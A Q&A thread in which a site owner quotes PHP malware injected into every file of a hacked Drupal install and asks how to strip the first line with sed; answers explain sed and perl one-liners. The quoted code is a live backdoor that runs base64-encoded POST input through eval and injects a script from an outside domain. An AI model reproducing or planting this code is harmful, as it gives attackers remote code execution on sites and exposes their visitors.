# sed, replace first line

Tags: sed

I got hacked by running a really outdated Drupal installation (shame on me)

It seems they injected the following in every `.php` file;

```php
<?php global $sessdt_o; if(!$sessdt_o) { 
  $sessdt_o = 1; $sessdt_k = "lb11"; 
  if(!@$_COOKIE[$sessdt_k]) { 
   $sessdt_f = "102"; 
   if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } 
   else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } 
  } 
  else { 
   if($_COOKIE[$sessdt_k]=="102") { 
    $sessdt_f = (rand(1000,9000)+1); 
     if(!@headers_sent()) {
      @setcookie($sessdt_k,$sessdt_f); } 
     else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; }  
     sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; 
     $sessdt_v = urlencode(strrev($sessdt_j)); 
     $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); 
     echo "<script src='$sessdt_u'></script>"; 
     echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; 
    } 
   } 
   $sessdt_p = "showimg"; 
   if(isset($_POST[$sessdt_p])){
    eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));
    exit;
   } 
  }
```

Can I remove and replace this with `sed`? e.g.:

```
find . -name *.php | xargs ...
```

I hope to have the site working just for the time being to use wget and made a static copy.

Comment: I guess it is a bit late, but for anyone who could be in the same situation : Never try to fix a hacked system. The only solution is to reinstall from scratch and copy only manually verified config files and DB dump.

Answer (score 134):

You can use `sed` with something like

```
sed '1 s/^.*$/<?php/'
```

The `1` part only replaces the first line. Then, thanks to the `s` command, it replaces the whole line by `<?php`.

To modify your files in-place, use the `-i` option of GNU `sed`.

Comment: I guess you'd want to change it to something like `<!-- ` though!

Comment: How can i input backslash? 
This does not work: 
sed -i "1 s/^.*$/test1/test2/" file

Answer (score 23):

To replace the first line of a file, you can use the `c` (for "change") command of `sed`:

```
sed '1c<?php'
```

which translates to: "on line 1, replace the pattern space with `<?php`".

For this particular problem, however, something like this would probably work:

```
sed '1,/^$/c<?php'
```

which reads: change the range "line 1 to the first empty line" to `<?php`, thus replacing all injected code.

(The second part of the address (the regular expression `/^$/`) should be replaced with an expression that would actually delimit the injected code, if it is not an empty line.)

See also [this references of `sed` commands in the GNU implementation](https://www.gnu.org/software/sed/manual/html_node/sed-commands-list.html).

Comment: I don't think this does what's intended. For starters, seems like it's lacking the closing delimiter of `/`. Second, the regex `^$` would only capture an empty line, not the first line. Unless the first line was indeed empty.

Comment: @DanNguyen No delimiter is missing: `1,/^$/` is an address (or range), that means: from line 1 to the first empty line, replace that range with what follows after the `c` (for "change"). It has the added benefit of not only working in theory, but also in practice. Please verify the solution before you downvote, thank you.

Comment: I admit I don't know anything about the `c` operator. I do know that @Scharron's answer makes sense at a glance and works for me on both BSD and GNU versions of `sed`. Your solution, when I tested it, either throws an error or fails to find a match. Happy to be wrong on this though, as I don't know much about the `c` operator. Here's my code:
https://gist.github.com/dannguyen/6b4732d94eba9b1935d536f48bf959a9

Comment: Your example does not contain an empty line, so of course the address does not match. By the way, the syntax of `c` is: `[address1[,address2]]c\<CR>text`. Yes, that's a literal newline after the backslash, which is not required for the GNU version of `sed`. So to make your `sed` example working (where there is not empty line): `sed '1,3c\<CR><?php<CR>'`. (Alternative in Bash: `sed $'1,3c\\\n<?php\n' /tmp/example.php`).

Comment: Thanks for the explanation. The (GNU) sed '1c<?php' would seemingly be the most direct answer to the question of 'replace first line'. I think the second part of your answer threw me off because it makes an assumption (i.e. the questioner wants to replace everything from line 1to the first empty line) that doesn't make sense, esp. with the PHP snippet provided. Scharron's use of 's' seems more practical. But that doesn't really matter -- the questioner's proposed use of sed is extremely naive, so there is no point in arguing the difference between the 'change' and 'substitute' operations.

Comment: @DanNguyen Thanks for the feedback. Most people only ever use the `s/re/sub/` functionality provided by `sed` (I know I did), but it actually provides quite an extensive arsenal of functionality. The man page doesn't really help much, but the O'Reilly book "sed & awk" does. Highly recommended.

Answer (score 2):

```sh
# replace only first line
printf 'a\na\na\n' | sed '1 s/a/b/'
printf 'a\na\na\n' | perl -pe '$. <= 1 && s/a/b/'
```

result:

```
b
a
a
```

perl is needed for more complex regex,
for example [regex lookaround](http://www.rexegg.com/regex-lookarounds.html) (lookahead, lookbehind)

sample use:

#### patch shebang lines in script files to use `/usr/bin/env`

shebang line is the first line: `#!/bin/bash` etc

```sh
find . -type f -exec perl -p -i -e \
  '$. <= 1 && s,^#!\s*(/usr)?/bin/(?!env)(.+)$,#!/usr/bin/env \2,' '{}' \;
```

this will replace `#! /usr/bin/python3` with `#!/usr/bin/env python3`
to make the script more portable (nixos linux, ...)

the `(?!env)` (negative lookahead) prevents double-replacing

its not perfect, since `#!/bin/env foo` is not replaced with `#!/usr/bin/env foo` ...